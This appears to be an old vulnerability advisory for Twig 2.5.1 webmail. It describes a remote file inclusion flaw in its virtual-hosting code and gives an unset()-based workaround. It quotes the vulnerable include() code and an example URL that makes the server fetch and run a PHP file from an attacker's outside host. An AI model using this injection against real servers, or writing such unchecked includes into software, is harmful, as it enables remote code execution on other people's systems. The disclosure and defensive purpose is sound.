COMMAND

    Twig

SYSTEMS AFFECTED

    Twig 2.5.1

PROBLEM

    Joao  Gouveia  aka  Tharbad  found  following.   Twig is a popular
    webmail  system  written  in  PHP,    once  called  Muppet.    The
    possibility of processing our own php file , can leed to arbitrary
    command execution on the server as the httpd user.

    Twig is designed to allow the use of virtual hosting, unfortunatly
    the script that checks this fails to check for user suplied input,
    thus  allowing   anyone  to   submit  malicious   values  as   the
    configuration  directory.   The  faulty  piece  of  code  is   (in
    index.php3):

        // Allow for virtual hosting
         $config_dir = "config";
         if( $vhosts[$SERVER_NAME] )
        
        
            $config_dir = $vhosts[$SERVER_NAME];
            include( $config_dir . "/config.inc.php3" );
            include( $config_dir . "/images.inc.php3" );
          }

    If the  vhosts "directive"  is not  initialized, It  is trivial to
    exploit it.  Let's look at an example:
    1. We create  a config.inc.php3 script  with " <?  phpinfo(); ?> "
       in it, and upload it to some free web hosting service machine.
    2. We go to the vulnerable site using Twig and type in browser:

        http://twig.vuln.site/index.php3?vhosts[twig.vuln.site]=http://free.host.machine/~mydir/

    3. The script gladdly  includes _my_ config.inc.php3 and  executes
       it, presenting me with  the phpinfo relative to  the vulnerable
       site.

    You can surely imagine this danger, for example if the  vulnerable
    site has safe_mode  disable, we could  just use a  system($string)
    to execute arbitrary comands as the http user.

    Even if safe mode is  enabled, it's still possible to  execute our
    code, for things like revealing the source of php files, which may
    contain sensitive data in it.

    Note: this only works if our free web hosting doesn't process  the
    php3 file.

SOLUTION

    Author(s) warned on  2000-11-13, the fix  will be included  on the
    next version.  As a short term fix try the following, simply add:

        unset($config);
        unset($vhosts);

    at the top of config/config.inc.php.

    Also add:

        unset($dbconfig);

    at the top of config/dbconfig.inc.php3 for good measure.

    Please note  that this  vulnerability is  only exploitable  if the
    URL  fopen  wrappers  functionality  is  compiled  in  (it  is  by
    default) and the  script isn't being  run on the  windows platform
    (Windows does not support Remote Files functionality in  include()
    statements).